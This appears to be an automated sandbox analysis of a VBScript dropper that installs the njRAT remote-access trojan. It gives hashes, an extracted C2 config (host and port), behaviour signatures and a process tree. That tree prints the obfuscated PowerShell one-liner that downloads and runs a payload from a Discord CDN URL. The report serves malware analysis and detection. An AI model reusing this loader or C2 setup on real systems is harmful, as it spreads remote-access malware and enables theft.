Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
26-10-2021 13:09
General
-
Target
RFQ-474552121.vbs
-
Size
15KB
-
MD5
147841ac2ca60229a754403fddad59ec
-
SHA1
9de7705976aec4bedd6f8805065ac17be1282d75
-
SHA256
a88a9fc866e2da0a88fbbf44e23b39b3bb980135b0d1c1aafbbef87490c2f34c
-
SHA512
92be569b47e9a8445bfb62b44b3bf3a1116b528520a958f037967f16a0746f9ff6c23ceab63c1d7159565e20656cdf193c768323efa0e151f407b9775516f4b4
Malware Config
Extracted
njrat
v2.0
------(XxX)------
new.libya2020.com.ly:2020
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Drops startup file 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ-474552121.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/901770008810618905/902212483350147082/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\update.exe"C:\Users\Public\update.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\update.exe"C:\Users\Public\update.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
C:\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
C:\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
memory/1020-56-0x0000000000000000-mapping.dmp
-
memory/1020-59-0x0000000002800000-0x0000000002802000-memory.dmpFilesize
8KB
-
memory/1020-61-0x0000000002804000-0x0000000002807000-memory.dmpFilesize
12KB
-
memory/1020-60-0x0000000002802000-0x0000000002804000-memory.dmpFilesize
8KB
-
memory/1020-58-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmpFilesize
11.4MB
-
memory/1020-62-0x000000001B750000-0x000000001BA4F000-memory.dmpFilesize
3.0MB
-
memory/1020-63-0x000000000280B000-0x000000000282A000-memory.dmpFilesize
124KB
-
memory/1536-69-0x0000000000250000-0x0000000000257000-memory.dmpFilesize
28KB
-
memory/1536-64-0x0000000000000000-mapping.dmp
-
memory/1536-70-0x0000000004A50000-0x0000000004A51000-memory.dmpFilesize
4KB
-
memory/1536-71-0x0000000000960000-0x0000000000989000-memory.dmpFilesize
164KB
-
memory/1536-67-0x0000000000910000-0x0000000000911000-memory.dmpFilesize
4KB
-
memory/1940-75-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-76-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-74-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-77-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-78-0x000000000040839E-mapping.dmp
-
memory/1940-73-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-80-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-82-0x0000000076231000-0x0000000076233000-memory.dmpFilesize
8KB
-
memory/1940-83-0x00000000055F0000-0x00000000055F1000-memory.dmpFilesize
4KB
-
memory/2004-55-0x000007FEFBB91000-0x000007FEFBB93000-memory.dmpFilesize
8KB